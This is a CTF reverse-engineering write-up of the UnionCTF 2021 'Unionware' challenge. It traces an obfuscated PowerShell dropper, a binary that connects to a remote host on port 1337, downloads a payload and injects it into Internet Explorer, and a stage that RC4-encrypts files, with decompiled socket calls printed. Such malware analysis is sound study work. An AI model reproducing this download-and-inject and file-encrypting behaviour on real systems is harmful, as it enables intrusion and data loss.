Try   HackMD

UnionCTF 2021 - Unionware (reverse)

Description:

image0

Part 1: powershell file analysis

This is an obfuscate form of powershell, used spit() . Write scripts to get content clearly. Then we will have the file lnELKNdoie .exe

Part 2: lnELKNdoie.exe file analysis

At the beginning of the file there is checkVM function and some other checks, I choose next directly through these checks.

image1

Enter conn function, because the file used xor obfuscate, I debug to know function to be called, explain to conn:

// define winsock
v6 = ((int (__cdecl *)(int, int *, int, int))ws2_32_WSAStartup(514, &v40, a3, a4);

// get info of this addr 35.241.159.62 --> 62.159.241.35.bc.googleusercontent.com
((int (__stdcall *)(__m128i *, int, _DWORD *, void (**)(void)))ws2_32_getaddrinfo)(&v38, dword_40A3F8, v41, &v39);

// socket
    s = (const CHAR *)((int (__stdcall *)(_DWORD, _DWORD, _DWORD, __m128i *))ws2_32_socket)(*((_DWORD *)v39 + 1),*((_DWORD *)v39 + 2),*((_DWORD *)v39 + 3),v48);
    
// conn 62.159.241.35.bc.googleusercontent.com:1337
((int (__stdcall *)(const CHAR *, _DWORD, _DWORD))ws2_32_connect)(s,*((_DWORD *)v35 + 6),*((_DWORD *)v35 + 4));

// send: "KADMKLAFD:LSM$OPM@FLK:FM!N$@N$"
((int (__stdcall *)(const CHAR *, __m128i *, int, _DWORD))ws2_32_send)(s,&v28,&v28.m128i_i8[strlen(v28.m128i_i8) + 1] - &v28.m128i_i8[1],0)

 // recv
((int (__stdcall *)(const CHAR *, _BYTE *, int, _DWORD))ws2_32_recv)(s, buf, 1024, 0);

// shutdown
(int (__stdcall *)(const CHAR *, int))ws2_32_shutdown)(s, 1);

receive data until size == 0x6B200:

image2

The downloaded file will be Injected into IE, this Inject technique is quite similar link

Part 3: file out.exe

The file will look in the folder Document file plaintext:

  v14 = SHGetFolderPathA(0, 5, 0, 0, pszPath);
  j_strncat(pszPath, "\\j3w3ls", 8u);           // //Documents//j2w3ls

process encrypt data:

image3

Enter encrypt function, we will see many functions that define the functions in the cryptopp library, and then create key 128bytes by random function with seed at the time of encrypt :

image4

Struct file:

  • The first 128 bytes are the key RC4
  • The other is the ciphert text

Writing a simple script to recover the original file is going to have the flag.

All file .idb and scripts i used in files folder.

Reference

RC4.c

Last changed by 
Lan Vu
0
154

Read more

Some challenges in Realworld CTF 2023

Introduction Last weekend, I played realworld CTF with VAT team and we got the great ranking. My teammates are so strong tho. This blog post will explain some challenges that we can or can not solve in this CTF, but after it ended, I read some write-ups and want to note the knowledge I learned. Thank you guys so much. NonHeavyFTP This challenge uses the opensource of lightFTP in github. We heared about this protocol before but until now we still don't know how to the protocol work? So we will explain some information about it before dig deeper to the challenge. Protocol overview FTP is a client-server protocol that relies on two communications between the client and server: a command channel for controlling the conversation and a data channel for transmitting file content. FTP may run in active or passive mode, which determines how the data connection is established

Jan 13, 2023
Elliptic Curve Cryptography

Today, Elliptic Curve Cryptography (ECC) appears in TSL, SSL, PGP, and many other things including Bitcoin and Blockchain. The Goal (My application is based on C language, but in the blog I will explain ECC in Python language to skip bignum part.) I explain how I applied ECC algorithm on secure transmission channel from server to client. I used Elliptic Curve Diffie-Hellman (ECDH) key exchange to generate keys for Advanced Encryption Standard (AES). That key used to encrypt the data exchanged between the client and the server. In addition, I use of Elliptic Curve Digital Signature Algorithm (ECDSA) as a authentication mechanism. ECC Over Finite Fields GF(p)

Dec 13, 2022
LINE CTF 2022 - Reversing

Rolling At the first time, we spent a lot of time to try run blow script (using dlopen, aarch64 simulation) but it&apos;s segfaulted all times &#x1F622; #include <stdio.h> #include <stdlib.h> #include <dlfcn.h> #include <unistd.h> int main() {

Dec 13, 2022
Convert (ASCIS22)

S&#x1A1; qua v&#x1EC1; binary Ch&#x1B0;&#x1A1;ng tr&#xEC;nh cho tr&#x1B0;&#x1EDB;c &#x111;&#x1ECB;a ch&#x1EC9; c&#x1EE7;a PIE puts("I have some gift for you ^^"); return puts((const char *)&retaddr); sau &#x111;&#xF3; ch&#x1B0;&#x1A1;ng tr&#xEC;nh &#x111;i v&#xE0;o 1 v&#xF2;ng while th&#x1EF1;c hi&#x1EC7;n ch&#x1EE9;c n&#x103;ng th&#xEA;m note v&#xE0;o 1 chu&#x1ED7;i linked-list, v&#xE0; handle chu&#x1ED7;i &#x111;&#xF3; theo 2 ki&#x1EC3;u( htb ho&#x1EB7;c bth nh&#x1B0;ng khi exploit m&#xEC;nh ch&#x1EC9; c&#x1EA7;n d&#xF9;ng m&#x1ED7;i htb v&#xE0; ch&#x1B0;a hi&#x1EC3;u bth d&#xF9;ng &#x111;&#x1EC3; l&#xE0;m g&#xEC;) __int64 __fastcall route(Note *note)

Oct 21, 2022
Read more from Lan Vu
Published on HackMD